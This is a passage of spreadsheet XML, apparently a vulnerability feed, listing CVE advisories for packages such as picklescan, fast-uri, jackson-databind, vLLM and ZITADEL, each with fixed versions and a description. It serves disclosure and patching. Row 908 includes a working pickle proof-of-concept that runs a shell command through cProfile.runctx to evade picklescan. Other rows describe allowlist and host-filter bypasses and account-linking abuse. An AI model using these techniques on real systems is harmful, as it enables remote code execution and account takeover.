      <c r="M904" s="5" t="inlineStr"/>
      <c r="N904" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O904" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P904" s="5" t="inlineStr"/>
      <c r="Q904" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R904" s="5" t="inlineStr">
        <is>
          <t>An insufficient input validation vulnerability in the listed NETGEAR RAX series models allows a network-adjacent attacker having network access (such as WiFi credentials) to crash the router's management UI. There is no confidentiality or integrity impact. A crash of the router's management UI does not impact the availability of the router's core services like WiFi network.</t>
        </is>
      </c>
      <c r="S904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9216</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B905" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C905" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-62198</t>
        </is>
      </c>
      <c r="D905" s="5" t="inlineStr"/>
      <c r="E905" s="5" t="inlineStr"/>
      <c r="F905" s="5" t="inlineStr"/>
      <c r="G905" s="5" t="inlineStr"/>
      <c r="H905" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I905" s="5" t="inlineStr"/>
      <c r="J905" s="5" t="inlineStr"/>
      <c r="K905" s="5" t="inlineStr"/>
      <c r="L905" s="5" t="inlineStr">
        <is>
          <t>maven:org.apache.atlas:atlas-dashboardv2</t>
        </is>
      </c>
      <c r="M905" s="5" t="inlineStr">
        <is>
          <t>2.5.0</t>
        </is>
      </c>
      <c r="N905" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O905" s="5" t="inlineStr"/>
      <c r="P905" s="5" t="inlineStr"/>
      <c r="Q905" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="R905" s="5" t="inlineStr">
        <is>
          <t>An authenticated user can perform XSS.
This issue affects Apache Atlas versions 2.4.0 and earlier.
Users are recommended to upgrade to version 2.5.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-62198</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B906" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C906" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-66336</t>
        </is>
      </c>
      <c r="D906" s="5" t="inlineStr"/>
      <c r="E906" s="5" t="inlineStr"/>
      <c r="F906" s="5" t="inlineStr"/>
      <c r="G906" s="5" t="inlineStr"/>
      <c r="H906" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I906" s="5" t="inlineStr"/>
      <c r="J906" s="5" t="inlineStr"/>
      <c r="K906" s="5" t="inlineStr"/>
      <c r="L906" s="5" t="inlineStr">
        <is>
          <t>pip:doris-mcp-server</t>
        </is>
      </c>
      <c r="M906" s="5" t="inlineStr">
        <is>
          <t>0.6.1</t>
        </is>
      </c>
      <c r="N906" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O906" s="5" t="inlineStr"/>
      <c r="P906" s="5" t="inlineStr"/>
      <c r="Q906" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R906" s="5" t="inlineStr">
        <is>
          <t>Apache Doris MCP Server contains a SQL injection vulnerability in a metadata query path. A user-controlled database name is directly interpolated into a SQL query, and the query is executed without passing the caller's authorization context. This may allow an authenticated attacker, or an anonymous attacker if authentication is disabled, to bypass SQL security validation and access metadata outside the intended database scope.
Affected users are recommended to upgrade to Doris version 0.6.1 or later, which fixes the issue.</t>
        </is>
      </c>
      <c r="S906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-66336</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B907" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C907" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-69904</t>
        </is>
      </c>
      <c r="D907" s="5" t="inlineStr"/>
      <c r="E907" s="5" t="inlineStr"/>
      <c r="F907" s="5" t="inlineStr"/>
      <c r="G907" s="5" t="inlineStr"/>
      <c r="H907" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I907" s="5" t="inlineStr"/>
      <c r="J907" s="5" t="inlineStr"/>
      <c r="K907" s="5" t="inlineStr"/>
      <c r="L907" s="5" t="inlineStr"/>
      <c r="M907" s="5" t="inlineStr"/>
      <c r="N907" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O907" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P907" s="5" t="inlineStr"/>
      <c r="Q907" s="5" t="inlineStr"/>
      <c r="R907" s="5" t="inlineStr">
        <is>
          <t>Linkstack v4.8.4 and earlier is vulnerable to Path Traversal, which allows an administrator to read arbitrary files on the server by manipulating file path input. Successful exploitation may lead to unauthorized access to sensitive system or application files.</t>
        </is>
      </c>
      <c r="S907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-69904</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B908" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C908" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71378</t>
        </is>
      </c>
      <c r="D908" s="5" t="inlineStr"/>
      <c r="E908" s="5" t="inlineStr"/>
      <c r="F908" s="5" t="inlineStr"/>
      <c r="G908" s="5" t="inlineStr"/>
      <c r="H908" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I908" s="5" t="inlineStr"/>
      <c r="J908" s="5" t="inlineStr"/>
      <c r="K908" s="5" t="inlineStr"/>
      <c r="L908" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M908" s="5" t="inlineStr">
        <is>
          <t>0.0.30</t>
        </is>
      </c>
      <c r="N908" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O908" s="5" t="inlineStr"/>
      <c r="P908" s="5" t="inlineStr"/>
      <c r="Q908" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R908" s="5" t="inlineStr">
        <is>
          <t>### Summary
Using cProfile.runctx function, which is a built-in python library function to execute remote pickle file.
### Details
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to cProfile.runctx function in reduce method
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
### PoC
```
import cProfile
class EvilCProfileRunctx:
    def __reduce__(self):
        # cProfile.runctx(cmd, globals, locals) -&gt; exec(cmd, ...)
        return cProfile.runctx, ("__import__('os').system('whoami')", None, None)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908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71378</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B909" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13676</t>
        </is>
      </c>
      <c r="D909" s="5" t="inlineStr"/>
      <c r="E909" s="5" t="inlineStr"/>
      <c r="F909" s="5" t="inlineStr"/>
      <c r="G909" s="5" t="inlineStr"/>
      <c r="H909" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I909" s="5" t="inlineStr"/>
      <c r="J909" s="5" t="inlineStr"/>
      <c r="K909" s="5" t="inlineStr"/>
      <c r="L909" s="5" t="inlineStr">
        <is>
          <t>npm:fast-uri</t>
        </is>
      </c>
      <c r="M909" s="5" t="inlineStr">
        <is>
          <t>2.4.2, 3.1.3, 4.0.1</t>
        </is>
      </c>
      <c r="N909" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O909" s="5" t="inlineStr"/>
      <c r="P909" s="5" t="inlineStr"/>
      <c r="Q909" s="5" t="inlineStr">
        <is>
          <t>CWE-436, CWE-551</t>
        </is>
      </c>
      <c r="R909" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fast-uri` versions `&gt;= 2.3.1, &lt;= 4.0.0` fail to canonicalize Unicode/IDN hostnames for HTTP-family URLs. The IDN conversion path calls `URL.domainToASCII(...)` on the global WHATWG `URL` constructor, where that helper does not exist. The resulting `TypeError` is silently routed into `parsed.error`, but `parse()`, `normalize()`, and `equal()` all return with the host left in its original Unicode form.
For example, `http://127。0。0。1/` is treated by `fast-uri` as host `127。0。0。1`, while Node's WHATWG URL parser and `fetch()` canonicalize the same input to `127.0.0.1`.
Applications that use `fast-uri` to enforce host-based policy (denylists, loopback filtering, redirect validation, outbound proxy routing) before passing the same URL into Node's URL or `fetch()` consumers see a policy/use desync and can be steered to an unintended destination.
### Patches
Upgrade to `fast-uri` v4.0.1, v3.1.3, or v2.4.2
### Workarounds
None. Upgrade to the patched version.</t>
        </is>
      </c>
      <c r="S909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13676</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B910" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39835</t>
        </is>
      </c>
      <c r="D910" s="5" t="inlineStr"/>
      <c r="E910" s="5" t="inlineStr"/>
      <c r="F910" s="5" t="inlineStr"/>
      <c r="G910" s="5" t="inlineStr"/>
      <c r="H910" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I910" s="5" t="inlineStr"/>
      <c r="J910" s="5" t="inlineStr"/>
      <c r="K910" s="5" t="inlineStr"/>
      <c r="L910" s="5" t="inlineStr">
        <is>
          <t>go:golang.org/x/crypto</t>
        </is>
      </c>
      <c r="M910" s="5" t="inlineStr">
        <is>
          <t>0.52.0</t>
        </is>
      </c>
      <c r="N910" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O910" s="5" t="inlineStr"/>
      <c r="P910" s="5" t="inlineStr"/>
      <c r="Q910" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-476</t>
        </is>
      </c>
      <c r="R910" s="5" t="inlineStr">
        <is>
          <t>SSH servers which use CertChecker as a public key callback without setting IsUserAuthority or IsHostAuthority could be caused to panic by a client presenting a certificate. CertChecker now returns an error instead of panicking when these callbacks are nil.</t>
        </is>
      </c>
      <c r="S910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39835</t>
        </is>
      </c>
    </row>
    <row r="911">
      <c r="A911" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B911" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40983</t>
        </is>
      </c>
      <c r="D911" s="5" t="inlineStr"/>
      <c r="E911" s="5" t="inlineStr"/>
      <c r="F911" s="5" t="inlineStr"/>
      <c r="G911" s="5" t="inlineStr"/>
      <c r="H911" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I911" s="5" t="inlineStr"/>
      <c r="J911" s="5" t="inlineStr"/>
      <c r="K911" s="5" t="inlineStr"/>
      <c r="L911" s="5" t="inlineStr">
        <is>
          <t>maven:io.micrometer:micrometer-core</t>
        </is>
      </c>
      <c r="M911" s="5" t="inlineStr">
        <is>
          <t>1.15.12, 1.16.6</t>
        </is>
      </c>
      <c r="N911" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O911" s="5" t="inlineStr"/>
      <c r="P911" s="5" t="inlineStr"/>
      <c r="Q911" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R911" s="5" t="inlineStr">
        <is>
          <t>In Micrometer, it is possible for a user to provide specially crafted gRPC requests that may cause a denial-of-service (DoS) condition.
Affected versions:
Micrometer 1.16.0 through 1.16.5; 1.15.0 through 1.15.11.</t>
        </is>
      </c>
      <c r="S911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40983</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B912" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40984</t>
        </is>
      </c>
      <c r="D912" s="5" t="inlineStr"/>
      <c r="E912" s="5" t="inlineStr"/>
      <c r="F912" s="5" t="inlineStr"/>
      <c r="G912" s="5" t="inlineStr"/>
      <c r="H912" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I912" s="5" t="inlineStr"/>
      <c r="J912" s="5" t="inlineStr"/>
      <c r="K912" s="5" t="inlineStr"/>
      <c r="L912" s="5" t="inlineStr">
        <is>
          <t>maven:io.micrometer:micrometer-core, maven:io.micrometer:micrometer-jetty11, maven:io.micrometer:micrometer-jetty12</t>
        </is>
      </c>
      <c r="M912" s="5" t="inlineStr">
        <is>
          <t>1.15.12, 1.16.6</t>
        </is>
      </c>
      <c r="N912" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O912" s="5" t="inlineStr"/>
      <c r="P912" s="5" t="inlineStr"/>
      <c r="Q912" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R912" s="5" t="inlineStr">
        <is>
          <t>In Micrometer, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.
Affected versions:
micrometer-core 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18; 1.9.0 through 1.9.17.
micrometer-jetty11 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18.
micrometer-jetty12 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18.</t>
        </is>
      </c>
      <c r="S912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40984</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B913" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48043</t>
        </is>
      </c>
      <c r="D913" s="5" t="inlineStr"/>
      <c r="E913" s="5" t="inlineStr"/>
      <c r="F913" s="5" t="inlineStr"/>
      <c r="G913" s="5" t="inlineStr"/>
      <c r="H913" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I913" s="5" t="inlineStr"/>
      <c r="J913" s="5" t="inlineStr"/>
      <c r="K913" s="5" t="inlineStr"/>
      <c r="L913" s="5" t="inlineStr">
        <is>
          <t>maven:io.netty:netty-codec-http2</t>
        </is>
      </c>
      <c r="M913" s="5" t="inlineStr">
        <is>
          <t>4.1.135.Final, 4.2.15.Final</t>
        </is>
      </c>
      <c r="N913" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O913" s="5" t="inlineStr"/>
      <c r="P913" s="5" t="inlineStr"/>
      <c r="Q913" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-401, CWE-772</t>
        </is>
      </c>
      <c r="R913" s="5" t="inlineStr">
        <is>
          <t>### Impact
The `DelegatingDecompressorFrameListener` class orchestrates HTTP/2 decompression by embedding a per-stream `EmbeddedChannel` that runs the appropriate decompression codec (gzip, deflate, zstd) and forwards decompressed chunks to a wrapped listener. Each decompressed chunk is a pooled `ByteBuf` handed to an anonymous `ChannelInboundHandlerAdapter` tail handler, which becomes the sole owner responsible for releasing it.
A remote peer could send frames that would result in the flow-controller throwing and so trigger a resource leak which at the end might take down the whole JVM due OOME.</t>
        </is>
      </c>
      <c r="S913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48043</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B914" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54513</t>
        </is>
      </c>
      <c r="D914" s="5" t="inlineStr"/>
      <c r="E914" s="5" t="inlineStr"/>
      <c r="F914" s="5" t="inlineStr"/>
      <c r="G914" s="5" t="inlineStr"/>
      <c r="H914" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I914" s="5" t="inlineStr"/>
      <c r="J914" s="5" t="inlineStr">
        <is>
          <t>jackson-databind, fasterxml</t>
        </is>
      </c>
      <c r="K914" s="5" t="inlineStr"/>
      <c r="L914" s="5" t="inlineStr">
        <is>
          <t>maven:com.fasterxml.jackson.core:jackson-databind, maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M914" s="5" t="inlineStr">
        <is>
          <t>2.18.8, 2.21.4, 3.1.4</t>
        </is>
      </c>
      <c r="N914" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O914" s="5" t="inlineStr"/>
      <c r="P914" s="5" t="inlineStr"/>
      <c r="Q914" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R914" s="5" t="inlineStr">
        <is>
          <t>## Summary
`BasicPolymorphicTypeValidator.Builder.allowIfSubTypeIsArray()` allowlists any array type based only on `clazz.isArray()`, without validating the array's component (element) type against the configured allowlist. A PTV built with `allowIfSubTypeIsArray()` plus an explicit concrete-type allowlist therefore still permits `EvilType[]` even though `EvilType` is not allowlisted. When Jackson deserializes the elements and no per-element type IDs are present, it instantiates the component type directly with no further PTV check, bypassing the allowlist.
## Impact
Applications using `BasicPolymorphicTypeValidator` with `allowIfSubTypeIsArray()` as a safeguard get no protection for concrete array component types; an attacker controlling JSON can instantiate non-allowlisted types via an array wrapper, re-opening the gadget-instantiation risk PTV is meant to prevent.
## Affected / Patched (verified via `git tag --contains`)
- 2.18 line: `&gt;= 2.10.0, &lt; 2.18.8` -&gt; fixed in **2.18.8**
- 2.19-2.21 line: `&gt;= 2.19.0, &lt; 2.21.4` -&gt; fixed in **2.21.4**
- 3.x line: `&gt;= 3.0.0, &lt; 3.1.4` -&gt; fixed in **3.1.4**
`PolymorphicTypeValidator` was added in 2.10.0 so vulnerability N/A for versions prior to that.
## Severity / CWE
Maintainer: significant. Reporter: HIGH. CWE-184 (Incomplete List of Disallowed Inputs); related CWE-502.
## Upstream fix
FasterXML/jackson-databind#5981; fix PR #5983 (`24529da`), 2.18 backport PR #5984 (`01d1692`). Released 2026-06-04 in 2.18.8 / 2.21.4 / 3.1.4.
## Credits
Omkhar Arasaratnam (@omkhar) - finder.</t>
        </is>
      </c>
      <c r="S914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54513</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B915" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56340</t>
        </is>
      </c>
      <c r="D915" s="5" t="inlineStr"/>
      <c r="E915" s="5" t="inlineStr"/>
      <c r="F915" s="5" t="inlineStr"/>
      <c r="G915" s="5" t="inlineStr"/>
      <c r="H915" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I915" s="5" t="inlineStr"/>
      <c r="J915" s="5" t="inlineStr"/>
      <c r="K915" s="5" t="inlineStr"/>
      <c r="L915" s="5" t="inlineStr">
        <is>
          <t>pip:vllm</t>
        </is>
      </c>
      <c r="M915" s="5" t="inlineStr">
        <is>
          <t>0.13.0</t>
        </is>
      </c>
      <c r="N915" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O915" s="5" t="inlineStr"/>
      <c r="P915" s="5" t="inlineStr"/>
      <c r="Q915" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-123, CWE-502, CWE-787</t>
        </is>
      </c>
      <c r="R915" s="5" t="inlineStr">
        <is>
          <t>### Summary
The fix [here](https://github.com/vllm-project/vllm/pull/27204) for CVE-2025-62164 is not sufficient. The fix only disables prompt embeds by default rather than addressing the root cause, so the DoS vulnerability remains when the feature is enabled.
### Details
vLLM's pending change attempts to fix the root cause, which is the missing sparse tensor validation.  PyTorch (~v2.0) disables sparse tensor validation (specifically, sparse tensor invariants checks) by default for performance reasons.  vLLM is adding the sparse tensor validation to ensure indices are valid, non-negative, and within bounds.  These checks help catch malformed tensors.
### PoC
NA
### Impact
Current fix only added a flag to disable/enable prompt embeds, so by default, prompt embeds feature is disabled in vLLM, which stops DoS attacks through the embeddings.  However, It doesn’t address the problem when the flag is enabled and there is still potential for DoS attacks.
### Changes
* https://github.com/vllm-project/vllm/pull/30649</t>
        </is>
      </c>
      <c r="S915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56340</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B916" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56665</t>
        </is>
      </c>
      <c r="D916" s="5" t="inlineStr"/>
      <c r="E916" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F916" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G916" s="5" t="inlineStr"/>
      <c r="H916" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I916" s="5" t="inlineStr"/>
      <c r="J916" s="5" t="inlineStr"/>
      <c r="K916" s="5" t="inlineStr"/>
      <c r="L916" s="5" t="inlineStr">
        <is>
          <t>go:github.com/zitadel/zitadel</t>
        </is>
      </c>
      <c r="M916" s="5" t="inlineStr">
        <is>
          <t>3.4.12, 4.15.2</t>
        </is>
      </c>
      <c r="N916" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O916" s="5" t="inlineStr"/>
      <c r="P916" s="5" t="inlineStr"/>
      <c r="Q916" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R916" s="5" t="inlineStr">
        <is>
          <t>### Summary
A token lifecycle validation vulnerability was discovered in ZITADEL's external JWT Identity Provider (IdP) implementation
Specifically, within the validation pipeline, if an incoming JWT omits the `exp` claim entirely, the expiration block is silently skipped rather than rejected. The token is treated as valid forever.
Per the OIDC Core 1.0 specification, identity token validation pipelines must strictly handle and enforce session expiration. ZITADEL's silent acceptance of tokens missing these temporal constraints compromises session integrity.
### Impact
An attacker in possession of a token lacking an `exp` claim holds a permanent credential with no automatic expiration or revocation window.
### Affected Versions
Systems running one of the following versions are affected:
* **4.x**: `4.0.0` through `4.15.1` (including RC versions)
* **3.x**: `3.0.0` through `3.4.11` (including RC versions)
### Patches
The vulnerability has been addressed in the latest releases. ZITADEL now explicitly rejects tokens that lack an `exp` claim.
* **4.x**: Upgrade to $\ge$ [4.15.2](https://github.com/zitadel/zitadel/releases/tag/v4.15.2)
* **3.x**: Upgrade to $\ge$ [3.4.12](https://github.com/zitadel/zitadel/releases/tag/v3.4.12)
### Workarounds
The recommended solution is to update ZITADEL to a patched version.
If an immediate upgrade is not feasible, ensure at the upstream Identity Provider level that an external IdP explicitly includes the `exp` claim in all signed JWTs.
### Publication Note
This issue was originally disclosed as part of a unified security bulletin published under [GHSA-wxg7-w2v3-w38g](https://github.com/zitadel/zitadel/security/advisories/GHSA-wxg7-w2v3-w38g). To satisfy CVE Numbering Authority regulations regarding independently fixable logic flaws, the missing token expiration validation (`exp`) has been moved into this separate tracking entry so a distinct CVE ID can be correctly mapped to it.
### Questions
If there are any questions or comments about this advisory, send an email to [security@zitadel.com](mailto:security@zitadel.com)
### Credits
ZITADEL thanks [Android-Login-Analysis](https://github.com/Android-Login-Analysis), Jason Zhou and [Pedro Giglioti](https://github.com/Punisher100) for reporting this vulnerability.</t>
        </is>
      </c>
      <c r="S916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56665</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B917" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56666</t>
        </is>
      </c>
      <c r="D917" s="5" t="inlineStr"/>
      <c r="E917" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F917" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G917" s="5" t="inlineStr"/>
      <c r="H917" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I917" s="5" t="inlineStr"/>
      <c r="J917" s="5" t="inlineStr"/>
      <c r="K917" s="5" t="inlineStr"/>
      <c r="L917" s="5" t="inlineStr">
        <is>
          <t>go:github.com/zitadel/zitadel</t>
        </is>
      </c>
      <c r="M917" s="5" t="inlineStr">
        <is>
          <t>4.15.3</t>
        </is>
      </c>
      <c r="N917" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O917" s="5" t="inlineStr"/>
      <c r="P917" s="5" t="inlineStr"/>
      <c r="Q917" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R917" s="5" t="inlineStr">
        <is>
          <t>### Summary
A flaw in the external identity provider handler allows unauthorized account linking to occur under specific administrative configurations. When auto-linking by email is enabled, ZITADEL checks that the local user's email is verified, but does not explicitly cross-check whether the incoming external identity provider (IdP) also verified that email address upstream.
### Impact
When a user logs in via an external identity provider, the system can automatically link them to an existing local account if their email addresses match. However, because the system fails to check if the external provider actually verified ownership of that email, a security risk is introduced if a loose or public provider is connected.
If an administrator enables email auto-linking for an external identity provider that allows anyone to sign up with an unverified email address, an attacker can exploit this behavior. By registering an account on that permissive provider using a victim's email address and logging in, the system will automatically link the attacker's federated identity to the victim's legitimate local account. This allows the attacker to log into the victim's account without requiring any interaction or confirmation from the victim.
This issue represents a configuration-dependent anomaly rather than an unconditioned attack vector. Because the scenario relies entirely on an explicit administrative choice to trust a permissive external directory and link accounts automatically based purely on email strings, the practical operational risk is classified as **Medium**. 
### Affected Versions
Systems running one of the following versions are affected:
* **4.x:** `4.0.0` through `4.15.2` (including RC versions)
* **3.x:** `3.0.0` through `3.4.12` (including RC versions)
### Patches
The vulnerability has been addressed in the latest releases. The patch resolves the issue by requiring that the external identity provider's email verification status is explicitly validated before allowing any automatic linking logic to proceed.
* **4.x**: Upgrade to $\ge$ [4.15.3](https://github.com/zitadel/zitadel/releases/tag/v4.15.3)
* **3.x**: Upgrade to $\ge$ [4.15.3](https://github.com/zitadel/zitadel/releases/tag/v4.15.3)
### Workarounds
If an immediate upgrade is not possible, implement one of the following mitigations:
* Disable auto-linking by email entirely by setting the option to `AUTO_LINKING_OPTION_UNSPECIFIED` on corresponding identity providers.
* Audit external IdP configurations and restrict email auto-linking strictly to trusted enterprise identity directories (e.g., corporate Okta or Azure AD) where email verification is strictly enforced and managed by corporate policy.
### Questions
If you have any questions or comments about this advisory, please email us at [security@zitadel.com](mailto:security@zitadel.com)
### Credits
Thanks to [Android-Login-Analysis](https://github.com/Android-Login-Analysis) and [Alejandro Yadlin](https://github.com/ayadlin) for reporting this vulnerability.</t>
        </is>
      </c>
      <c r="S917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56666</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B918" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56825</t>
        </is>
      </c>
      <c r="D918" s="5" t="inlineStr"/>
      <c r="E918" s="5" t="inlineStr"/>
      <c r="F918" s="5" t="inlineStr"/>
